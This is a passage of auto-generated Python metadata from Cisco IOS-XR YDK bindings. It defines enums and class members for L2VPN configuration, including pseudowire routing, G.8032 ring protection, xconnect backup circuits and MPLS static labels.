'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable targetted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Associates a set of VLAN IDs with the G
.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Vlan IDs in the format of a-b,c,d,e-f,g
,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
